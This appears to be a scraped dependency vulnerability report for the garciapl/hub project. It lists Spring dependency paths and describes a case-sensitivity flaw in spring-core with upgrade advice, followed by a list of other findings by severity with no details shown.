Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE

…and 24 more

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to String.toLowerCase() having some Locale dependent exceptions that could potentially result in fields not protected as expected.

Note:

The fix for CVE-2022-22968 made disallowedFields patterns in DataBinder case insensitive.

This vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.

Remediation

Upgrade org.springframework:spring-core to version 6.1.14 or higher.

References

Improper Handling of Case Sensitivity vulnerability report

garciapl/hub

Vulnerabilities

Dependencies

Source

Commit

Find, fix and prevent vulnerabilities in your code.

critical severity

Insecure Defaults

Detailed paths

Overview

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Details

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Remediation

References

high severity

Insufficient Session Expiration

Detailed paths

Overview

Remediation

References

high severity

Improper Input Validation

Detailed paths

Overview

Remediation

References

high severity

Remote Code Execution

Detailed paths

Overview

Remediation

References

high severity

Remote Code Execution (RCE)

Detailed paths

Overview

Remediation

References

high severity

Insecure Temporary File

Detailed paths

Overview

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Details

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Details

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview

Details

Remediation

References

high severity

Denial of Service (DoS)

Detailed paths

Overview